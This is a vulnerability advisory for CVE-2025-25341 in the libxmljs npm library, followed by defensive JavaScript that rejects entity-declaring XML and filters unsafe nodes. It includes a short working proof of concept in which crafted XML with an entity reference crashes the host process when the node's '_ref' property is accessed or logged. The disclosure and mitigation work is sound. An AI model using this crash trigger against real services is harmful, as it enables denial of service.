CVE-2025-25341 - Segmentation Fault in libxmljs
Introduction
I discovered a vulnerability in the libxmljs library, where parsing crafted XML may produce entity_ref and entity_decl nodes that are unsafe to interact with; accessing internal properties on these nodes triggers a segmentation fault and crashes the program.
Note: While the library is no longer maintained, the vulnerability remains relevant - the package has 261k downloads per month, with 337 dependent packages - https://www.npmjs.com/package/libxmljs
The Vulnerability + PoC
Minimal XML:
<!DOCTYPE note [<!ENTITY writer "X">]>
<from>&writer;</from>
Minimal JS:
const libxmljs = require('libxmljs');
// The minimal XML from above, as a string
const docText = '<!DOCTYPE note [<!ENTITY writer "X">]>\n<from>&writer;</from>';
const doc = libxmljs.parseXml(docText);
const from = doc.get('//from');
const c = from.childNodes()[0]; // entity_ref node
Using Object.getOwnPropertyNames(c) outputs ['_ref']
Accessing this property will create a segmentation fault, like the snippet below:
console.log(c['_ref']);
Alternatively, it can be triggered on childNodes:
const c2 = c.childNodes()[0]; // entity_decl node
Using Object.getOwnPropertyNames(c2) outputs ['_ref'], and we can trigger a segmentation fault with:
console.log(c2['_ref']);
The property is also accessed implicitly by common operations, such as logging:
console.log(c); // Causes segmentation fault
console.log(c2); // Causes segmentation fault
Impact
In affected programs, this vulnerability can easily lead to a denial of service by crashing the host process.
However, exploitation requires the program to:
- Parse untrusted XML using this library
- Interact with the resulting node objects to reach the affected wrappers
This remains impactful, as the crash can be triggered through generally harmless behaviors during development, such as logging and property inspection. While these types of crashes may be indicative of deeper memory safety issues, I did not validate any exploitation beyond crashing the process.
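The two conditions above suggest two defensive layers for programs that must parse untrusted XML with this library. The following is an added example, not code from the advisory or from libxmljs: a pre-parse guard that rejects input declaring entities (so no entity_ref or entity_decl wrappers are ever created), and a tree-walking helper that skips those wrappers in an already-parsed document. It assumes libxmljs's node.type() reports these nodes with the names 'entity_ref' and 'entity_decl'; parseXml is passed in so the guard runs without the library installed.

```javascript
// Added example; not part of the advisory or of libxmljs itself.
// Layer 1: refuse input that declares entities before it reaches the parser.
// In well-formed XML a literal "<!ENTITY" can only appear in a DTD, a comment,
// a CDATA section or a PI, so rejecting on any occurrence is deliberately
// conservative: a false positive costs a rejected document, not a crash.
const ENTITY_DECL = /<!ENTITY\b/i;

function containsEntityDeclaration(xmlText) {
  return ENTITY_DECL.test(xmlText);
}

// Wrapper around libxmljs.parseXml(): throws instead of parsing risky input.
// `parseXml` is injected so this function can be exercised without the library.
function parseUntrustedXml(xmlText, parseXml) {
  if (containsEntityDeclaration(xmlText)) {
    throw new Error('rejected: XML declares entities (CVE-2025-25341 trigger)');
  }
  return parseXml(xmlText);
}

// Layer 2: node types whose wrapper objects must never be logged or inspected.
// Assumption: libxmljs node.type() returns exactly these names for them.
const UNSAFE_NODE_TYPES = new Set(['entity_ref', 'entity_decl']);

// Returns the children of `node` with the unsafe wrappers filtered out, so a
// caller can iterate, log or inspect the result without touching `_ref`.
function safeChildNodes(node) {
  return node.childNodes().filter((child) => !UNSAFE_NODE_TYPES.has(child.type()));
}

// Constructed sample input: the advisory's minimal document.
const SAMPLE_UNSAFE_XML = '<!DOCTYPE note [<!ENTITY writer "X">]>\n<from>&writer;</from>';
const SAMPLE_SAFE_XML = '<from>hello</from>';
```

Note that safeChildNodes only filters direct children; the document's DTD node and the entity_decl beneath an entity_ref are still reachable through other accessors, so the pre-parse guard is the layer to rely on for untrusted input.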